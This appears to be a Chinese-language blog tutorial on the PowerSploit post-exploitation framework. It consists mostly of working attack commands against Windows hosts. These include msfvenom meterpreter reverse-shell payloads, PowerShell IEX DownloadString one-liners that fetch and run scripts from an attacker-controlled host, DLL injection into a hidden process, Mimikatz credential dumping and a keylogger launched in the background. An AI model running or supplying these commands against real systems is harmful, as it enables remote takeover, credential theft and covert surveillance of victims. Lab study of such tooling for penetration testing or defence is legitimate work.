PowerSploit攻击

简介

PowerSploit是一款后渗透框架,主要用于信息侦察、权限提升、权限维持。它在github上可以下载

各模块功能

模块功能
AntivirusBypass发现杀毒软件的查杀特征
CodeExecution在目标主机上执行代码
Exfiltration目标主机上的信息搜集工具
Mayhem蓝屏等破坏性脚本
Persistence后门脚本
Recon以目标主机为跳板进行内网信息侦察
ScriptModification在目标主机上创建或修改脚本

在这里插入图片描述

Invoke-Shellcode

首先我们在msf上开启监听
在这里插入图片描述
然后使用如下命令生成一个powershell木马

msfvenom -p windows/meterpreter/reverse_http lhost=172.16.179.87 lport=4444 -f powershell -o /var/www/html/test

在这里插入图片描述

然后我们使用powershell在目标机器上进行远程加载,并强制执行

IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87/Invoke-Shellcode.ps1")
IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87/test")
Invoke-Shellcode -Shellcode ($buf) -Force

在这里插入图片描述
发现kali已经返回了一个shell
在这里插入图片描述

Invoke-DllInjection

我们先将invoke-dllinjection这个文件加载过来,然后隐蔽地开启一个notepad进程

IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87/Invoke-DllInjection.ps1")
start-process C:\Windows\system32\notepad.exe -WindowStyle Hidden
get-process

在这里插入图片描述
kali的设置

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.179.87 lport=4444 -f dll -o /var/www/html/test.dll
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.179.87
set lport 4444
run

在这里插入图片描述

我们将test.dll文件上传到目标C盘上
在这里插入图片描述
然后我们使用如下命令,进行注入

Invoke-DllInjection -ProcessID 3132 -Dll C:\test.dll

在这里插入图片描述

kali获得一个反弹的shell
在这里插入图片描述

Invoke-Portscan

首先我们先远程加载一下,然后运行运行以下命令扫描主机

IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87:8000/PowerSploit/Recon/Invoke-Portscan.ps1")
Invoke-Portscan -Host 172.16.179.87

在这里插入图片描述

Invoke-Mimikatz

这个脚本是Mimikatz的powershell版本,主要是用于导出票据的。我们先把Invoke-Mimikatz脚本下载到边界服务器上
在这里插入图片描述
然后在边界服务器上开启一个服务端,把脚本远程加载到另一台域主机上

IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.108.100:8000/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -DumpCreds

在这里插入图片描述
在这里插入图片描述

Get-Keystrokes

这个脚本用于键盘记录,功能相当强大,不仅有键盘输入记录,甚至能记录鼠标的点击情况,还能记录详细的时间,实战的时候可以直接放入后台运行。

IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87/PowerSploit/Exfiltration/Get-Keystrokes.ps1")
Get-Keystrokes -LogPath c:\test1.txt

在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值